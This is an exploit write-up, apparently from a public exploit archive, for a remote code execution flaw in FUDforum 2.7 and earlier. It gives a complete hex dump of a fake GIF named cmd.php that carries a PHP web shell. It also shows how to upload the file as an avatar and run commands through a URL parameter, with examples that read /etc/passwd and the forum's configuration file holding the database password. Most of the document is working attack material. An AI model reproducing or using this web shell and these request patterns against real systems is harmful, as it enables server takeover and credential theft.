Remote code execution exploit for FUD Forum versions 2.7 and below.
68a63805a860c1ee120af420819c0ab4d12a5942b56e21c9e07b5373a6c5856e
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-identifier">FUDforum <= 2.7 remote (based on http://www.securityfocus.com/bid/14678...)
no need for code:
I create a malformed gif (to bypass image format check...),
called cmd.php, this an hexadecimal dump of the file...
47 49 46 38 39 61 09 00 0C 00 80 00 00 FF 00 00
FF FF FF 21 F9 04 01 3C 3F 70 68 70 20 73 79 73
74 65 6D 28 24 48 54 54 50 5F 47 45 54 5F 56 41
52 53 5B 63 6D 64 5D 29 3B 20 3F 3E 00 00 01 00
2C 00 00 00 00 09 00 0C 00 00 02 14 8C 8F 01 90
B6 9C 1E 3C 72 AA 4A B1 93 88 F7 D5 80 CD 58 00
00 3B
inside you have:
<?php system($HTTP_GET_VARS[cmd]); ?>
You can upload this, then retrieve the image url form profile page, usually something
like:
http://[target]/[path]/images/custom_avatars/[something].php
so you call this url in this way:
http://[target]/[path]/images/custom_avatars/[something].php?cmd=[command]%20>%20temp.txt
redirecting the output to a temporary file (if not you will see strange chars on screen)...
examples:
http://[target]/[path]/images/custom_avatars/[something].php?cmd=cat%20/etc/passwd%20>%20temp.txt
than see temp.txt file
or to see database password:
http://[target]/[path]/images/custom_avatars/[something].php?cmd=cat%20../../../FUDforum/include/GLOBALS.PHP%20>%20temp.txt
rgod
site: http://rgod.altervista.org
mail: retrogod@aliceposta.it
</span></span>
</code></pre>